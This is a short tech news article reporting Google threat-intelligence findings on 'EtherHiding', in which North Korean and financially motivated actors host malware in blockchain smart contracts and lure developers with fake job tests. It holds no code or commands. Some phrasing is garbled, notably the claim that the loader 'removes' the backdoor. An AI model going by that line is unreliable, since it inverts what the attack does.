- UNC5342 uses blockchain smart contracts to spread crypto-stealing malware via EtherHiding
- Fake jobs and coding challenges trick developers into triggering the JadeSnow loader and backdoor.
- Blockchain immutability makes malware hosting resilient
North Korean state-sponsored threat actors are now using public blockchains to host malicious code and deploy malware to target endpoints.
This is according to Google’s Threat Intelligence Group (GTIG), which said it observed UNC5342 using Ethereum and BNB to host droppers and ultimately deploy cryptocurrency-stealing malware against software and blockchain developers.
The technique is called EtherHiding. Instead of sending a malicious file directly to the victim (or tricking them into downloading it), they encode parts of the malware into blockchain transactions and smart contracts.
Evolution of foolproof hosting
The smart contract itself doesn’t automatically run malware on someone’s computer, but it can provide instructions or code when a user interacts with it (when clicking a link, running a script, or connecting a crypto wallet).
The blockchain is a great place to store and distribute malware because it is public, immutable, and almost impossible to tamper with.
“This represents an evolution toward next-generation, foolproof hosting,” Google said, noting that the resilient nature of blockchain is what makes it so attractive to cybercriminals.
Starting in February, UNC5342 was observed creating fake jobs and coding challenges, tricking developers and others working in the Web3 space into uploading different files. These files connect to the blockchain and retrieve code which, in turn, installs the JadeSnow loader. This loader removes the InvisibleFerret backdoor, which has previously been observed in cryptocurrency thefts.
This isn’t the first time we’ve seen blockchain used to spread malware. The technique has been in use since 2023, and in the same report Google also mentions a financially motivated actor, UNC5142, using the same technique.
This group has been seen compromising WordPress sites to host malicious JavaScript code connected to the blockchain. So far, more than 14,000 infected sites have been discovered.
North Korea is known for targeting the crypto industry and using stolen funds to finance its weapons program and state apparatus.
Via The file
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds. Make sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp Also.
